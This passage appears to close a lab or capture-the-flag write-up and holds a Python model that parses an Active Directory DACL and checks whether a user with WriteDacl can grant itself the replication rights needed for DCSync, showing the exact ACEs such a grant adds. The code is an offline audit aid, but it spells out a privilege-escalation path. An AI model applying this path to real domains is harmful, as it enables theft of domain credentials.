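REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"      # DS-Replication-Get-Changes
REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"  # DS-Replication-Get-Changes-All

# Access-mask bits (subset of the SDDL rights table).
RIGHT_BITS = {
    "GA": 0x10000000, "GR": 0x80000000, "GW": 0x40000000, "GX": 0x20000000,
    "WD": 0x00040000, "WO": 0x00080000, "RC": 0x00020000, "SD": 0x00010000,
    "CR": 0x00000100, "LO": 0x00000080, "DT": 0x00000040, "WP": 0x00000020,
    "RP": 0x00000010, "SW": 0x00000008, "LC": 0x00000004, "DC": 0x00000002, "CC": 0x00000001,
}
GENERIC_ALL, WRITE_DAC, WRITE_OWNER, CONTROL_ACCESS = 0x10000000, 0x40000, 0x80000, 0x100

# SIDs from the mimikatz output on the page; the ACL below is constructed.
DOMAIN_SID = "S-1-5-21-3269458654-3569381900-10559451"
CHENGLEI = DOMAIN_SID + "-1105"
ZHANGTAO = DOMAIN_SID + "-1106"
AUTHENTICATED_USERS = "S-1-5-11"

SAMPLE_SDDL = (
    "O:DAG:DAD:AI"
    "(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)"            # Domain Admins: full control (CR with no GUID = every extended right)
    f"(OA;;CR;{REPL_GET_CHANGES};;DD)"               # Domain Controllers: Get-Changes
    f"(OA;;CR;{REPL_GET_CHANGES_ALL};;DD)"           # Domain Controllers: Get-Changes-All
    f"(OA;;CR;{REPL_GET_CHANGES};;{ZHANGTAO})"       # zhangtao: one half of the pair, not enough for DCSync
    "(A;;RPLCLORC;;;AU)"                             # Authenticated Users: read
    f"(A;;WD;;;{CHENGLEI})"                          # chenglei: WriteDacl, the misconfiguration in this level
)


def _rights_mask(s):
    """Decode the rights field: hex/decimal literal or concatenated two-letter codes."""
    if s.lower().startswith("0x"):
        return int(s, 16)
    if s.isdigit():
        return int(s)
    mask = 0
    for i in range(0, len(s), 2):
        mask |= RIGHT_BITS.get(s[i:i + 2], 0)
    return mask


def _trustee_sid(t, domain_sid):
    """Expand the SDDL aliases seen on domain objects; anything else is taken as a literal SID."""
    aliases = {"DA": domain_sid + "-512", "DD": domain_sid + "-516", "EA": domain_sid + "-519",
               "BA": "S-1-5-32-544", "SY": "S-1-5-18", "AU": "S-1-5-11", "WD": "S-1-1-0", "ED": "S-1-5-9"}
    return aliases.get(t, t)


def parse_dacl(sddl, domain_sid):
    """Return [(ace_type, access_mask, object_guid, trustee_sid)] from the D: part of an SDDL string."""
    m = re.search(r"D:[^(]*((?:\([^)]*\))+)", sddl)
    if not m:
        return []
    aces = []
    for body in re.findall(r"\(([^)]*)\)", m.group(1)):
        parts = body.split(";")
        if len(parts) < 6:
            continue
        ace_type, _flags, rights, obj_guid, _inherit_guid, trustee = parts[:6]
        aces.append((ace_type, _rights_mask(rights), obj_guid.lower(), _trustee_sid(trustee, domain_sid)))
    return aces


def effective_rights(aces, token_sids):
    """Allowed-minus-denied mask per object GUID ('' = the object as a whole) for a token carrying
    token_sids (user SID plus group SIDs). A deny without a GUID applies to every GUID."""
    allowed, denied = {}, {}
    for ace_type, mask, guid, sid in aces:
        if sid not in token_sids:
            continue
        bucket = {"A": allowed, "OA": allowed, "D": denied, "OD": denied}.get(ace_type)
        if bucket is not None:
            bucket[guid] = bucket.get(guid, 0) | mask
    result = {}
    for guid, mask in allowed.items():
        mask &= ~(denied.get(guid, 0) | denied.get("", 0))
        if mask:
            result[guid] = mask
    return result


def assess(aces, token_sids):
    """Can the token DCSync now, and could it grant itself the right via WriteDacl/WriteOwner?"""
    rights = effective_rights(aces, token_sids)
    whole = rights.get("", 0)
    generic_all = bool(whole & GENERIC_ALL)
    any_extended = generic_all or bool(whole & CONTROL_ACCESS)

    def has_extended(guid):
        return any_extended or bool(rights.get(guid, 0) & CONTROL_ACCESS)

    write_dacl = generic_all or bool(whole & WRITE_DAC)
    write_owner = generic_all or bool(whole & WRITE_OWNER)
    return {
        "dcsync": has_extended(REPL_GET_CHANGES) and has_extended(REPL_GET_CHANGES_ALL),
        "write_dacl": write_dacl,
        "write_owner": write_owner,
        "can_grant_self_dcsync": write_dacl or write_owner,
    }


def dcsync_grant_sddl(sid):
    """The two replication ACEs a DCSync grant adds for sid (a model of the result, not dacledit's code)."""
    return f"D:(OA;;CR;{REPL_GET_CHANGES};;{sid})(OA;;CR;{REPL_GET_CHANGES_ALL};;{sid})"


if __name__ == "__main__":
    aces = parse_dacl(SAMPLE_SDDL, DOMAIN_SID)
    token = {CHENGLEI, AUTHENTICATED_USERS}
    print("before dacledit:", assess(aces, token))
    print("after dacledit :", assess(aces + parse_dacl(dcsync_grant_sddl(CHENGLEI), DOMAIN_SID), token))
```

On a live domain the input for this comes from the nTSecurityDescriptor of the domain head (dacledit -action read, or an LDAP query); the point of the model is that a principal with WriteDacl but no replication rights is one ACE write away from DCSync, so an audit has to treat the two the same.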

Another route is to abuse WriteDACL for RBCD (resource-based constrained delegation); see the Aoselu range writeup for that variant.
Reference:
https://www.s1mh0.cn/blog/index.php/2025/04/14/cqyj_delivery/